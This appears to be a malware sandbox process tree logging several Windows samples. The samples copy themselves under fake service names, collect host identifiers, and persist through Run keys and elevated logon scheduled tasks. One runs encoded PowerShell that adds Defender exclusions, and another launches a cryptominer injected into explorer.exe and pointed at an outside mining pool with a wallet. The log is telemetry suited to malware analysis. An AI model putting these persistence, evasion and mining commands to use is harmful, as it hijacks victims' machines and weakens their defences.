C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:12⤵PID:1476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:12⤵PID:4440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4816 /prefetch:82⤵PID:3920
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1772
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1392
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5404
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap2172:190:7zEvent147201⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:556
-
C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe"C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5160 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5460
-
-
C:\ProgramData\SystemData\igfxCUIService.exe"C:\ProgramData\SystemData\igfxCUIService.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:4784 -
C:\Windows\SysWOW64\getmac.exe"C:\Windows\system32\getmac.exe"4⤵PID:840
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber4⤵PID:2000
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1124
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt"3⤵PID:2980
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic OS get Caption, CSDVersion, OSArchitecture, Version / value4⤵
- System Location Discovery: System Language Discovery
PID:2628
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt"3⤵
- System Location Discovery: System Language Discovery
PID:5644 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic nicconfig where 'IPEnabled = True' get ipaddress4⤵
- System Location Discovery: System Language Discovery
PID:5548
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F3⤵PID:4572
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F4⤵
- Adds Run key to start application
- Modifies registry key
PID:4948
-
-
-
-
C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe"C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4124 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\ProgramData\SystemData\igfxCUIService.exe"C:\ProgramData\SystemData\igfxCUIService.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:1484 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:6000 -
C:\Windows\SysWOW64\getmac.exe"C:\Windows\system32\getmac.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4432
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber4⤵
- System Location Discovery: System Language Discovery
PID:5616
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1560
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt"3⤵
- System Location Discovery: System Language Discovery
PID:916 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic OS get Caption, CSDVersion, OSArchitecture, Version / value4⤵PID:2532
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt"3⤵
- System Location Discovery: System Language Discovery
PID:5748 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic nicconfig where 'IPEnabled = True' get ipaddress4⤵
- System Location Discovery: System Language Discovery
PID:5136
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F3⤵PID:5364
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F4⤵
- Adds Run key to start application
- Modifies registry key
PID:5452
-
-
-
-
C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe"C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536
-
-
C:\ProgramData\SystemData\igfxCUIService.exe"C:\ProgramData\SystemData\igfxCUIService.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1000 -
C:\Windows\SysWOW64\getmac.exe"C:\Windows\system32\getmac.exe"4⤵
- System Location Discovery: System Language Discovery
PID:2028
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber4⤵PID:2368
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1400
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt"3⤵
- System Location Discovery: System Language Discovery
PID:5860 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic OS get Caption, CSDVersion, OSArchitecture, Version / value4⤵PID:2616
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt"3⤵PID:5868
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic nicconfig where 'IPEnabled = True' get ipaddress4⤵PID:4712
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F3⤵
- System Location Discovery: System Language Discovery
PID:1868 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4424
-
-
-
-
C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe"C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
PID:4928 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
-
C:\ProgramData\SystemData\igfxCUIService.exe"C:\ProgramData\SystemData\igfxCUIService.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2620 -
C:\Windows\SysWOW64\getmac.exe"C:\Windows\system32\getmac.exe"4⤵PID:2552
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'3⤵
- Command and Scripting Interpreter: PowerShell
PID:5552
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt"3⤵PID:2388
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic OS get Caption, CSDVersion, OSArchitecture, Version / value4⤵PID:4188
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt"3⤵PID:5268
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic nicconfig where 'IPEnabled = True' get ipaddress4⤵PID:5912
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F3⤵
- System Location Discovery: System Language Discovery
PID:5624 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1584
-
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap8705:190:7zEvent278631⤵
- Suspicious use of AdjustPrivilegeToken
PID:5828
-
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1760 -
C:\Users\Admin\AppData\Roaming\xmrmine.exeC:\Users\Admin\AppData\Roaming\xmrmine.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4724 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit3⤵PID:3220
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:2656
-
-
-
C:\Users\Admin\appdata\roaming\serverpatch.exe"C:\Users\Admin\appdata\roaming\serverpatch.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4512 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit4⤵PID:5404
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:1348
-
-
-
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"4⤵
- Executes dropped EXE
PID:1952
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5296
-
-
-
-
C:\Users\Admin\AppData\Roaming\etcmin.exeC:\Users\Admin\AppData\Roaming\etcmin.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:220 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit3⤵PID:2920
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:5224
-
-
-
C:\Users\Admin\appdata\roaming\rtksmbs.exe"C:\Users\Admin\appdata\roaming\rtksmbs.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4984 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit4⤵PID:5144
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:5012
-
-
-
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"4⤵
- Executes dropped EXE
PID:4992
-
-
-
-
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5344 -
C:\Users\Admin\AppData\Roaming\xmrmine.exeC:\Users\Admin\AppData\Roaming\xmrmine.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1740 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit3⤵PID:3400
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:5064
-
-
-
-
C:\Users\Admin\AppData\Roaming\etcmin.exeC:\Users\Admin\AppData\Roaming\etcmin.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit3⤵PID:396
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:3780
-
-
-
-
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"1⤵
- Executes dropped EXE
PID:4552 -
C:\Users\Admin\AppData\Roaming\xmrmine.exeC:\Users\Admin\AppData\Roaming\xmrmine.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4044 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit3⤵PID:2716
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:5616
-
-
-
-
C:\Users\Admin\AppData\Roaming\etcmin.exeC:\Users\Admin\AppData\Roaming\etcmin.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2560 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit3⤵PID:4440
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:5768
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:5164
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273\" -ad -an -ai#7zMap5328:190:7zEvent117551⤵
- Suspicious use of AdjustPrivilegeToken
PID:5964
-
C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe"C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5016 -
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit2⤵PID:1272
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3968
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"2⤵PID:776
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4456
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\zqawds.exe"2⤵PID:4824
-
C:\Users\Admin\AppData\Roaming\zqawds.exeC:\Users\Admin\AppData\Roaming\zqawds.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:916 -
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit4⤵PID:5364
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"5⤵PID:3652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="5⤵PID:5504
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"4⤵
- Executes dropped EXE
PID:5452 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "wixbkzqmha"5⤵PID:1480
-
-
-
